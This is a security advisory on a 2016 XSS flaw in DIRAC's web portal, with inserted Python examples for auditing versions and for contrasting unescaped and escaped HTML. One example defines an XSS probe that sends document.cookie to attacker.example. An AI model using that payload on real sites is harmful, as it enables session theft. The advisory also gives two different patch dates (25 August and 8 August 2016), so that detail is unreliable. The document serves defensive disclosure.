Title: EGI SVG Advisory [TLP:WHITE] 'Moderate' Risk: XSS in DIRAC Webapp and Web portal [EGI-SVG-2016-11107]
Date: 2016-10-21
Updated:
Affected Software and Risk
==========================
Moderate risk vulnerability concerning XSS in DIRAC Webapp and Web portal
Package : DIRAC Webapp and Web portal
Actions Required/Recommended
============================
Sites are recommended to update the relevant components if they have not done so
since 25th August 2016, when the patched version was made available.
Affected software details
==========================
Versions of DIRAC prior to v6r15 are affected.
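A practical check for the statement above, added here as an example and not code from the advisory or from the DIRAC project: parse DIRAC release tags (assumed to follow DIRAC's vNrMpK naming, e.g. v6r14p25, v6r15, v6r15-pre3; the grammar and the handling of pre-releases are assumptions made for this example) and classify an inventory of hosts against the fixed release v6r15. Pre-releases of v6r15 are treated as older than the final release, i.e. still affected, which is the conservative reading. The hostnames are constructed.

```python
import re

# Fixed release named by the advisory: versions of DIRAC prior to v6r15 are affected.
FIXED_VERSION = "v6r15"

# DIRAC release tags look like v6r15, v6r15p3 or v6r15-pre2 (major "v", minor "r",
# optional patch "p", optional pre-release suffix). This grammar is an assumption
# made for this example, not text from the advisory.
_VERSION_RE = re.compile(r"^v(\d+)r(\d+)(?:p(\d+))?(?:-pre(\d+))?$")


def parse_dirac_version(tag):
    """Turn a DIRAC version tag into a sortable tuple.

    Pre-releases sort before the final release of the same version, so
    v6r15-pre1 < v6r15 < v6r15p1. An unrecognised tag raises ValueError
    rather than silently sorting somewhere.
    """
    m = _VERSION_RE.match(tag.strip())
    if not m:
        raise ValueError("unrecognised DIRAC version tag: %r" % tag)
    major, minor, patch, pre = m.groups()
    is_final = 1 if pre is None else 0
    return (int(major), int(minor), int(patch or 0), is_final, int(pre or 0))


def is_affected(tag, fixed=FIXED_VERSION):
    """True when the installed version is older than the fixed release."""
    return parse_dirac_version(tag) < parse_dirac_version(fixed)


def audit(installed_versions):
    """Classify a host -> version-tag mapping into affected/patched/unknown."""
    report = {"affected": [], "patched": [], "unknown": []}
    for host, tag in sorted(installed_versions.items()):
        try:
            bucket = "affected" if is_affected(tag) else "patched"
        except ValueError:
            bucket = "unknown"  # unparseable tag: flag for a manual look
        report[bucket].append(host)
    return report


# Constructed sample inventory (hypothetical hostnames, not from the advisory).
SAMPLE_INVENTORY = {
    "web01.example.org": "v6r14p25",
    "web02.example.org": "v6r15",
    "web03.example.org": "v6r15-pre3",
    "web04.example.org": "v6r16p2",
    "web05.example.org": "unknown",
}

if __name__ == "__main__":
    for bucket, hosts in audit(SAMPLE_INVENTORY).items():
        print("%-8s %s" % (bucket, ", ".join(hosts) or "-"))
```

The "unknown" bucket exists on purpose: a tag the parser does not understand is more likely to be a locally built or renamed install than a safe one, so it is reported rather than assumed patched.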
More information
================
The reporter of the vulnerability stated that he was able to carry out an
exploit in which an authenticated user could escalate their privileges.
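The advisory does not describe the affected code path, so the following is a generic illustration of the bug class added here, not code from DIRAC or from the fix referenced in [R 2]: an HTML fragment built by interpolating user-controlled input directly, beside the same fragment with the input escaped for the attribute context it lands in, and a small parser-based check that shows whether the input was able to introduce a new element. The inputs are constructed for the example and are not the reporter's payload.

```python
import html
from html.parser import HTMLParser

# Constructed inputs: a harmless value and an XSS probe. Neither comes from the
# DIRAC report; the advisory does not disclose the payload used.
BENIGN_NAME = "alice"
PROBE = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(username):
    """Untrusted input interpolated straight into markup (the bug class).

    A value containing a quote and an angle bracket closes the attribute and
    the tag, and whatever follows is parsed as new elements by the browser.
    """
    return '<input name="user" value="%s">' % username


def render_fixed(username):
    """Same fragment with the input escaped for an HTML attribute context.

    html.escape(quote=True) converts & < > " ' to entities, so the value can
    never terminate the attribute or start a tag. Escaping is context
    specific: this is correct for attribute and text content, not for a
    value dropped inside a <script> block or a URL.
    """
    return '<input name="user" value="%s">' % html.escape(username, quote=True)


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(fragment):
    """Return the element names an HTML parser finds in the fragment."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


def injected_elements(render, untrusted, expected_tags=("input",)):
    """Elements present in the rendered output beyond what the template emits.

    An empty list means the untrusted value stayed inside the attribute.
    """
    return [t for t in tags_in(render(untrusted)) if t not in expected_tags]


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        print("%-10s benign=%s probe=%s" % (
            name,
            injected_elements(render, BENIGN_NAME),
            injected_elements(render, PROBE),
        ))
```

The parser check is a review aid, not a security control: the real fix is escaping (or a templating engine that escapes by default) at every point where untrusted data meets markup, and the check only confirms that a given output no longer contains elements the template did not put there.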
Component installation information
==================================
See [R 1]. Information on the XSS vulnerability is at [R 2].
TLP and URL
===========
** WHITE information - Unlimited distribution **
** see https://go.egi.eu/tlp for distribution restrictions **
URL: https://advisories.egi.eu/Advisory-SVG-2016-11107
Minor updates may be made without re-distribution to the sites
Credit
======
This vulnerability was reported by Simon Fayer from Imperial College, London.
References
==========
[R 1] https://github.com/DIRACGrid/DIRAC/wiki
[R 2] https://github.com/DIRACGrid/WebAppDIRAC/pull/251
Comments
========
Comments or questions should be sent to svg-rat at mailman.egi.eu
If you find or become aware of a vulnerability which is relevant to EGI you may
report it by e-mail to
report-vulnerability at egi.eu
the EGI Software Vulnerability Group will take a look.
Timeline
========
Yyyy-mm-dd [EGI-SVG-2016-11107]
2016-05-17 Vulnerability reported by Simon Fayer who is a member of SVG.
2016-05-17 Software providers responded and involved in investigation
2016-05-18 EGI SVG Risk Assessment completed - discussed at SVG meeting.
2016-05-19 Assessment by the EGI Software Vulnerability Group reported to the
software providers
2016-08-08 Updated packages available on the DIRAC website
2016-10-18 SVG asked whether the issue had been fixed; the software providers confirmed that it had
2016-10-21 Advisory/Alert sent to sites
2016-10-21 Public disclosure
On behalf of the EGI SVG,